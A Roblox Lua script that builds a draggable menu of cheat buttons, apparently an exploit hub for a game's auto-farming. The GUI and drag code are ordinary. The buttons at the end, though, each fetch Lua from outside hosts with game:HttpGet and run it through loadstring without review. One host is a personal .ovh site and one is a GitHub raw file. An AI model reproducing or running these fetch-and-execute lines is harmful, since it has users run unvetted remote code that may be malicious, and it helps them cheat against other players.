-- Gui to Lua -- Version: 3.2 -- Instances: local ScreenGui = Instance.new("ScreenGui") local Frame = Instance.new("Frame") local ScrollingFrame = Instance.new("ScrollingFrame") local UIListLayout = Instance.new("UIListLayout") local TextLabel = Instance.new("TextLabel") --Properties: ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui") ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling Frame.Parent = ScreenGui Frame.BackgroundColor3 = Color3.fromRGB(10, 10, 10) Frame.BorderColor3 = Color3.fromRGB(0, 0, 0) Frame.BorderSizePixel = 0 Frame.Position = UDim2.new(0.295069337, 0, 0.205735654, 0) Frame.Size = UDim2.new(0, 305, 0, 330) ScrollingFrame.Parent = Frame ScrollingFrame.Active = true ScrollingFrame.BackgroundColor3 = Color3.fromRGB(30, 30, 30) ScrollingFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) ScrollingFrame.BorderSizePixel = 0 ScrollingFrame.Position = UDim2.new(-0.000228131408, 0, 0.13900812, 0) ScrollingFrame.Size = UDim2.new(0, 305, 0, 284) UIListLayout.Parent = ScrollingFrame UIListLayout.HorizontalAlignment = Enum.HorizontalAlignment.Center UIListLayout.SortOrder = Enum.SortOrder.LayoutOrder UIListLayout.Padding = UDim.new(0, 3) TextLabel.Parent = Frame TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel.BackgroundTransparency = 1.000 TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0) TextLabel.BorderSizePixel = 0 TextLabel.Size = UDim2.new(0, 304, 0, 45) TextLabel.Font = Enum.Font.SourceSans TextLabel.Text = "MoreMoreButtons" TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel.TextSize = 14.000 -- Scripts: function makebutton(text, skrypt) local TextButton = Instance.new("TextButton") TextButton.Parent = ScrollingFrame TextButton.BackgroundColor3 = Color3.fromRGB(35, 35, 35) TextButton.BorderColor3 = Color3.fromRGB(0, 0, 0) TextButton.BorderSizePixel = 0 TextButton.Position = UDim2.new(0.0868852437, 0, 0, 0) TextButton.Size = UDim2.new(0, 252, 0, 36) TextButton.Font = Enum.Font.SourceSans TextButton.TextColor3 = Color3.fromRGB(255, 255, 255) TextButton.TextSize = 14.000 TextButton.Text = text TextButton.MouseButton1Click:Connect(function() loadstring(skrypt)() end) end local function LSEGQU_fake_script() -- Frame.LocalScript local script = Instance.new('LocalScript', Frame) local UserInputService = game:GetService("UserInputService") local runService = (game:GetService("RunService")); local gui = script.Parent local dragging local dragInput local dragStart local startPos function Lerp(a, b, m) return a + (b - a) * m end; local lastMousePos local lastGoalPos local DRAG_SPEED = (12); -- // The speed of the UI darg. function Update(dt) if not (startPos) then return end; if not (dragging) and (lastGoalPos) then gui.Position = UDim2.new(startPos.X.Scale, Lerp(gui.Position.X.Offset, lastGoalPos.X.Offset, dt * DRAG_SPEED), startPos.Y.Scale, Lerp(gui.Position.Y.Offset, lastGoalPos.Y.Offset, dt * DRAG_SPEED)) return end; local delta = (lastMousePos - UserInputService:GetMouseLocation()) local xGoal = (startPos.X.Offset - delta.X); local yGoal = (startPos.Y.Offset - delta.Y); lastGoalPos = UDim2.new(startPos.X.Scale, xGoal, startPos.Y.Scale, yGoal) gui.Position = UDim2.new(startPos.X.Scale, Lerp(gui.Position.X.Offset, xGoal, dt * DRAG_SPEED), startPos.Y.Scale, Lerp(gui.Position.Y.Offset, yGoal, dt * DRAG_SPEED)) end; gui.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragging = true dragStart = input.Position startPos = gui.Position lastMousePos = UserInputService:GetMouseLocation() input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragging = false end end) end end) gui.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then dragInput = input end end) runService.Heartbeat:Connect(Update) end coroutine.wrap(LSEGQU_fake_script)() --Here you can add buttons --example: makebutton("BeachBall Farm", "loadstring(game:HttpGet('http://dziecizautyzmem.ovh/plikistrony/directorybrowse/pliki/skrypty/mm2ballfarm.txt', true))()") makebutton("Coin Farm", "loadstring(game:HttpGet('http://dziecizautyzmem.ovh/plikistrony/directorybrowse/pliki/skrypty/coinautofarm.txt', true))()") makebutton("Lunar Hub", "loadstring(game:HttpGet('https://raw.githubusercontent.com/vwSaraa/LunarHub/main/mm2'))()")